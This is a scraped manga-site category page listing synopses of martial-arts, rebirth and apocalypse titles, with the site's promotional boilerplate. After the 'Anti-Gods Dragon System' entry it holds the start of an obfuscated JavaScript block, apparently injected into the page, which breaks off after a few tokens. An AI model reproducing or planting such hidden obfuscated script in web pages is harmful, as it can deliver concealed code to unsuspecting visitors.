Martial Arts - Page 7

Find your next favorite in manga Martial Arts with our collection of top picks. Read Martial Arts manga for free today!

2022 results

Ancient Herbalist

I, Qin Feng, the alchemy God, died in order to save the people of the world, but I never expected to open my eyes and be reborn to a world 100,000 years ago. Am I only capable of refining pills as a alchemy God? No! In this life, I will cultivate both alchemy and martial arts, break through adversity, and restore my family’s glory! Watch me use my memories from the past 100,000 years to create a different path to becoming a god! Reborn once again, I must go against fate and reach the pinnacle!”


Anecdotes about Spirits and Immortals

In the ancient era of the legendary Three Sage Kings and Five Virtuous Emperors, with the death of Shen Nong, the heroes of various clans began to stir. In this turbulent era, a young man appeared out of nowhere…


Angel Densetsu

The story is of Kitano Seiichirou, a very kind and pure-hearted young man, with a horrifying, monstrous face. People being what they are, they think he's a terrifying delinquent, and there are plenty of chance misunderstandings (coupled with Kitano's convenient inability to understand what's happening around him) that propel him into the position of "school guardian", a.k.a. head thug on campus.


Anti-Celestial Destiny

Wu You, who has been agonizing for 20 years, thought he would spend his whole life in a hurry, until he picked up the half fairy fairy jade in the trash can on a rainy day, and his fate was completely changed! Inherit the fairy body, the goddess as a companion, drop the demon and lay the devil, sitting on the one hundred billion! Start the counterattack!


Anti-Gods Dragon System

Tian Ling, a persecuted young man from his clan classmate, decided to get rid of him in a tragic way that led to death. At the moment of death his blood awakened the remains of a dragon millions of years ago known as the dragon system, he revived it in order to achieve their revenge in destroying the gods and become the supreme master … in a training journey to seek to destroy the heavens!<script></script><script>(function(_0x553198,_0xe8e1ad){var _0x55a5cd=_0x45da,_0xd98261=_0x553198();while(!![]){try{var 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Ao Shi Jiu Chong Tian

From EIH Scans: Reborn for the sake of a previous life. Reborn for the sake of martial arts. Chu Yang was under attack for the sake of the Jiu Jie Sword. Our hero was trapped and outnumbered by plunderers. Unexpectedly, between life and death, he was brought back 16 years in the past. Is this fate, or a coincidence? Will Chu Yang be able to change the past?


Aoi Destruction

Aoi Destruction is a compilation of short stories by Kazurou Inoue (Midori no Hibi and Aikora). The first 3 chapters are dedicated to the title story (Aoi Destruction). Story 2 is 'Rare Bookshop Owner Yakou's Hard-Fighting Chronicles'. Yakou was left to run his father's rare book store and bitterly resents it. Then a super-hot babe walks into his store. She's a "book-detective" and tells him she's taking over the store so Yakou can pursue his family's heritage--the "other job...". Story 3 is 'Full Scratch Eiji,' about a boy who tries to get away from his otaku past. He was a legend among figure makers, "E-Model-san," until a girl rejected him for being too "otaku." Yoshizaka is easily the big man on campus; adoring girls throng about him. Jealous boys chew their livers. Then he stops to help a goofy girl--who is thrilled to meet "E-Model-san"! She could ruin everything; he has to shut her up! Story 4 is 'Otone no Naisho,' a story about a young samurai girl who finds herself the owner of a perverted possessed katana. Not for kids.


Apex Future Martial Arts

Read Apex Future Martial Arts Manhua At The Beginning Of The Martial Dao, Abnormal Beasts Invaded The World. Humanity’s Martials Had To Retreat In Defeat Time And Time Again. Lu Sheng Transmigrates To That Time, But In His Dreams He Enters A World 10 000 Years Later. The Foundational Body Refining Method From 10K Years In The Future Is Several Thousand Times More Effective Than The Current One. Then There’s The Breathing Method, Body Refining Pill Formula, And Sacred Martial Law From 10K Years Later… Despite Developing Martial Arts For 10K Years, Humanity Was Annihilated! Their Martial Arts Civilization Reached The Apex, And Yet There Was No One Left To Inherit It. Except Lu Sheng, He’s Exactly That Last Spark Of Hope! 高武:登陆未来一万年 Welcome To Mangazin Site, You Can Read And Enjoy All Kinds Of Manhua Trending  Such As Drama, Manga, Manhwa, Romance…, For Free Here. All Of The Manhua New Will Be Update With High Standards Every Hours. If You Are A Comics Book (Manhua Hot ), Mangazin Is Your Best Choice, Don’t Hesitate, Just Read And Feel !    


Apex Gamer Returns

Read “Apex Gamer Returns” online at Best manga website Description about “Apex Gamer Returns”: The unknown game streamer, Bai Qi, died unexpectedly when he was about to reach the peak of his life while live-streaming a game called 《The Soul of the Throne》. Suddenly, he was reborn into the world of a difficult action game. Bai Qi must rely on his past experiences with the Tier system in games and the blessing【100 Achievement Completions for a Max-Leveled Account】given by the system. Will he be able to ascend the throne again and become the one and only king of that world? Associated Names: 重燃吧,T0级玩家! The place to read “Apex Gamer Returns”: Welcome to Mangazin, the fantastic world for manga enthusiasts. Here, you’ll find all the manga you need with the highest quality. What’s even more amazing is that reading manga on MangaZin is entirely free. Don’t hesitate any longer and start reading “Apex Gamer Returns” at MangaZin! Additionally, you can also read Trending Manhwa, Trending Manhua, Trending Comics, and more for free here! &nbsp;


Apocalypse Bug Master

As the apocalypse descends, all things mutate, and humanity falls from the top of the food chain, becoming nothing more than struggling ants. Plunder and slaughter fill every corner. This is a hell for ordinary people, but a paradise for the evolved. Starting with the Parasite of the Insect Emperor and gaining the power of evolution, I will become the ruler of this wasteland!


Apocalypse Sword God

Read “Apocalypse Sword God” Online At Best Manga Website Description About “Apocalypse Sword God”: If Mercy And Kindness Can’t Save The World, Then This Time, I Choose To Kill— Eternal Slayer! Heavenly Lightning Slash! Sword Of Annihilation! As Long As You Learn The Most Common Sword Skills, They Can Be Upgraded To Sss Rank?! Divine Talent + Forbidden Skills! I’m The Last Spark Of Hope In This Apocalypse! Associated Names: Doomsday Sword God, 末日剑神:我震惊全球! The Place To Read “Apocalypse Sword God”: Welcome To Mangazin, The Fantastic World For Manga Enthusiasts. Here, You’ll Find All The Manga You Need With The Highest Quality. What’s Even More Amazing Is That Reading Manga On Mangagg Is Entirely Free. Don’t Hesitate Any Longer And Start Reading “Apocalypse Sword God” At Mangagg! Additionally, You Can Also Read Trending Manhwa, Trending Manhua, Trending Comics, And More For Free Here!


Apotheosis – Ascension To Godhood

Luo Zheng, now a humble slave was born as the eldest son of a wealthy family. Due to his family's decline, the kidnapping of his sister by a powerful force, he can now only be stepped upon by others. However, heaven never seals off all exits. An ancient book left by his father reveals a secret divine technique, giving the reader immense power! But what is behind this power? This is a contest against fate.
